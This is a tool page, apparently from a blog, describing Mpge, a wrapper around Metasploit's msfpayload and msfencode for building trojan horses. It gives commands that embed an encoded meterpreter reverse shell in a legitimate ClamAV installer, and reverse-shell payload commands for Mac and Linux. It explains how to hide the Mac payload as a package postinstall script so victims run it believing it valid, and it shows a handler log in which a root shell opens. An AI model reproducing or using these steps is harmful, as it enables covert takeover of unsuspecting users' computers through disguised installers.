Mpge – a wrapper of msfpayload and msfencode of Metasploit

Mpge is a wrapper of msfpayload and msfencode of Metasploit. Is possible use it with Backtrack and Backbox.This wrapper creates trojan horses for Microsoft Windows, Linux and Mac Osx Panther, Tiger and Leopard.For mac osx in necessary after you creates a reverse shell insert in a package with Iceberg.dmg (Package Maker). Is possible creates files .dmg with DropDMG. I try this program after between two virtual machines: first real mac osx second virtual windows xp. Before i use this program between two real mac osx: The first mac osx is a mac book (black) and the second mac osx is a ibook g4 powerpc with os tiger. These two mac osx were connected on lan (intranet).The first mac osx (black) is in listening and expected the reverse shell. The second mac osx receive a packet (file .pkg or .dmg) and when the user click on file activate the reverse shell and insert a password with root. The first mac receive the reverse shell with root privilege.

Features

README

The script mpge.sh is a wrapper, while the files metrevshell443.rc, vncrevshell.rc, osxrev.rc, linux.rc are the files .rc that the script mpge.sh use to start the reverse shell and vnc reverse shell on Microsoft Windows. Osxrev.rc is a file that start reverse shell for mac osx and linux.rc is a file that start reverse shell for linux.

For create the trojan horse you can use a script and insert IP address and port before For create the trojan horse you can use a script and insert IP address and port before you need to go inside a script and insert the file originale that you want use. For example if you want use the file Clamavsetup.exe you insert the name in this line of script:

msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$porta R | msfencode -t exe -e x86/shikata_ga_nai -x ClamavSetup.exe -o ClamavSetup1.exe

Create a file named ClamavSetup1.exe and this is a trojan horse. The package per mac.doc is a doc that explains how to create these packets for mac osx.

Use the script evil.sh with the rev shell mac2 in a creation of packet as indicated in a doc package per mac.doc.

Dropdmg-3.1.2.dmg and Iceberg.dmg are the programs creates the files .pkg and .dmg for mac osx.

Creation Trojan Horse for mac osx and linux:

For Mac:

For creates the reverse shell for mac you use this syntax:

msfpayload osx/x86/shell_reverse_tcp LHOST=$ip LPORT=$porta X > mac2

chmod +x mac2

For Linux:

msfpayload linux/x86/shell/reverse_tcp LHOST=$ip LPORT=$porta X > linuxrev

chmod +x linuxrev

The encoding for Microsoft Windows is x86/shikata_ga_nai for mac and linux of course it is not necessary.

For create a packet for mac osx read package for mac.doc:

Use the script evil.sh and the rev shell mac2 in a creation of packet as indicated in a doc package per mac.doc.  In the scripts tab we select the Script Directory Iceberg (Package Maker) where we placed our post install script (mac2) and we select it in postinstall the script.(evil.sh). Now we click on the top left the Build button to build our pkg file. We place the file in a DMG on a share, on a USB stick or any other place from where our target will execute the installer thinking it is a valid package.We prepare our attacking machine to receive the shells that will be coming from the execution of the trojanned packaged in Metasploit and then we wait for the connections.

Example of reverse shell on mac osx:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD osx/x86/shell_reverse_tcp PAYLOAD => osx/x86/shell_reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.103 LHOST => 192.168.1.103

msf exploit(handler) > set ExitOnSeesion falseExitOnSeesion => false

msf exploit(handler) > exploit

[*] Handler binding to LHOST 192.168.1.103

[*] Started reverse handler[*] Starting the payload handler…

[*] Command shell session 1 opened (192.168.1.103:4444 -> 192.168.1.120:58942)

id

uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff)pwd

/

uname –a  Darwin Nome Utente-computer.local 7.9.0 Darwin Kernel Version 7.9.0: Wed Mar 30 20:11:17 PST 2005; root:xnu/xnu-571.12.7.obj~1/RELEASE_PPC Power Macintosh Powerpc

DownloadMpge.tgz (14.9 MB)

or read more in here : http://sourceforge.net/

Advertisements